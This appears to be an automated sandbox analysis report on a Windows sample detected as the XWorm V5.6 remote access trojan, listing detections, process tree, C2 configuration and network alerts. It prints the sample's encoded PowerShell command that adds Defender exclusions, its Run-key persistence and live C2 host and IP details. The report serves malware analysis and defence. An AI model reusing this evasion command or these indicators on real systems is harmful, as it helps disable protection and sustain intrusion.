
Windows Analysis Report
test2.exe.bin.exe

Overview

General Information

Sample name: test2.exe.bin.exe
Analysis ID: 1639881
MD5: 2aa459d8249147d19837b06c8640a950
SHA1: 38d8e8405b5efa19120d93b67a95ca03d0da3696
SHA256: 1a6ad2dbd06aa2cd83a7275e492b9c98388243f1dd10e96394933251480acad5
Tags: exe, user-TornadoAV_dev

Detection

XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • test2.exe.bin.exe (PID: 7744 cmdline: "C:\Users\user\Desktop\test2.exe.bin.exe" MD5: 2AA459D8249147D19837B06C8640A950)
    • powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2588 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • XClient.exe (PID: 7840 cmdline: "C:\Users\user\AppData\Local\Temp\XClient.exe" MD5: 4D152B9AAAEC95BD696369CE3793BBF5)
  • Music.UI.exe (PID: 7992 cmdline: "C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca MD5: F963F75C0AD152437E10D656A00793A3)
  • svchost.exe (PID: 7568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OpenWith.exe (PID: 8988 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • OpenWith.exe (PID: 9092 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • cleanup
{"C2 url": ["Dyno15-41078.portmap.host"], "Port": 41078, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\test | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\test | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0xc225:$str01: $VB$Local_Port
  • 0xc249:$str02: $VB$Local_Host
  • 0xa47e:$str03: get_Jpeg
  • 0xad21:$str04: get_ServicePack
  • 0xd092:$str05: Select * from AntivirusProduct
  • 0xd530:$str06: PCRestart
  • 0xd544:$str07: shutdown.exe /f /r /t 0
  • 0xd5f6:$str08: StopReport
  • 0xd5cc:$str09: StopDDos
  • 0xd6c2:$str10: sendPlugin
  • 0xd860:$str12: -ExecutionPolicy Bypass -File "
  • 0xdb69:$str13: Content-length: 5235
C:\Users\user\AppData\Local\Temp\test | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe4b6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xe553:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xe668:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xda84:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\XClient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\XClient.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0xc225:$str01: $VB$Local_Port
  • 0xc249:$str02: $VB$Local_Host
  • 0xa47e:$str03: get_Jpeg
  • 0xad21:$str04: get_ServicePack
  • 0xd092:$str05: Select * from AntivirusProduct
  • 0xd530:$str06: PCRestart
  • 0xd544:$str07: shutdown.exe /f /r /t 0
  • 0xd5f6:$str08: StopReport
  • 0xd5cc:$str09: StopDDos
  • 0xd6c2:$str10: sendPlugin
  • 0xd860:$str12: -ExecutionPolicy Bypass -File "
  • 0xdb69:$str13: Content-length: 5235

Source | Rule | Description | Author | Strings
00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe4fe:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xe59b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xe6b0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xdacc:$cnc4: POST / HTTP/1.1
00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe2b6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xe353:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xe468:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd884:$cnc4: POST / HTTP/1.1
Process Memory Space: test2.exe.bin.exe PID: 7744 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
3.0.XClient.exe.190000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
3.0.XClient.exe.190000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0xc225:$str01: $VB$Local_Port
  • 0xc249:$str02: $VB$Local_Host
  • 0xa47e:$str03: get_Jpeg
  • 0xad21:$str04: get_ServicePack
  • 0xd092:$str05: Select * from AntivirusProduct
  • 0xd530:$str06: PCRestart
  • 0xd544:$str07: shutdown.exe /f /r /t 0
  • 0xd5f6:$str08: StopReport
  • 0xd5cc:$str09: StopDDos
  • 0xd6c2:$str10: sendPlugin
  • 0xd860:$str12: -ExecutionPolicy Bypass -File "
  • 0xdb69:$str13: Content-length: 5235
3.0.XClient.exe.190000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe4b6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xe553:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xe668:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xda84:$cnc4: POST / HTTP/1.1

System Summary

Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\test, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, ProcessId: 7840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\test
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\test2.exe.bin.exe", ParentImage: C:\Users\user\Desktop\test2.exe.bin.exe, ParentProcessId: 7744, ParentProcessName: test2.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", ProcessId: 7788, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\test, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, ProcessId: 7840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\test
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\test2.exe.bin.exe", ParentImage: C:\Users\user\Desktop\test2.exe.bin.exe, ParentProcessId: 7744, ParentProcessName: test2.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", ProcessId: 7788, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\test2.exe.bin.exe", ParentImage: C:\Users\user\Desktop\test2.exe.bin.exe, ParentProcessId: 7744, ParentProcessName: test2.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA=", ProcessId: 7788, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7568, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-16T13:10:49.951717+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49773 | 193.161.193.99 | 41078 | TCP

AV Detection

Source: test2.exe.bin.exe | Avira: detected
Source: Dyno15-41078.portmap.host | Avira URL Cloud: Label: malware
Source: http://ns.adobe.om/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\test | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 00000003.00000002.3620480168.0000000002411000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["Dyno15-41078.portmap.host"], "Port": 41078, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Local\Temp\XClient.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\test | ReversingLabs: Detection: 91%
Source: test2.exe.bin.exe | Virustotal: Detection: 69%
Source: test2.exe.bin.exe | ReversingLabs: Detection: 80%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Dyno15-41078.portmap.host
Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp | String decryptor: 41078
Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp | String decryptor: <123456789>
Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp | String decryptor: <Xwormmm>
Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp | String decryptor: XWorm V5.6
Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp | String decryptor: USB.exe
Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp | String decryptor: %Temp%
Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp | String decryptor: test
Source: test2.exe.bin.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown | HTTPS traffic detected: 92.123.20.9:443 -> 192.168.2.4:49710 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49773 -> 193.161.193.99:41078
Source: Malware configuration extractor | URLs: Dyno15-41078.portmap.host
Source: global traffic | TCP traffic: 193.161.193.99 ports 41078,0,1,4,7,8
Source: global traffic | TCP traffic: 192.168.2.4:49711 -> 193.161.193.99:41078
Source: Joe Sandbox View | IP Address: 193.161.193.99
Source: Joe Sandbox View | ASN Name: BITREE-ASRU
Source: Joe Sandbox View | JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
  GET /XBLWinClient/v10_music/configuration.xml HTTP/1.1
  Accept: */*
  User-Agent: XBLWIN10.19071
  Accept-Language: en-CH
  Accept-Encoding: gzip, deflate, br
  Host: settings-ssl.xboxlive.com
  Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: settings-ssl.xboxlive.com
Source: global traffic | DNS traffic detected: DNS query: Dyno15-41078.portmap.host
Source: svchost.exe, 00000007.00000002.2862185954.000002CC6B400000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B298000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B298000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B298000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B2CD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://iptc.org/std1.
Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adob/
Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.om/
Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobeTy
Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adoe.cf
Source: Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.aobe
Source: powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1270956390.0000000005031000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.3620480168.0000000002411000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1270956390.0000000005031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B342000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.7.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.7.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.7.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B342000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1270956390.000000000581C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1270956390.0000000005990000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: Music.UI.exe, 00000004.00000002.3634791820.000002CCD9282000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3634553495.000002CCD91C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: Music.UI.exe, 00000004.00000002.3634791820.000002CCD9282000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
Source: Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.local
Source: Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.local/
Source: Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.net
Source: Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.net/
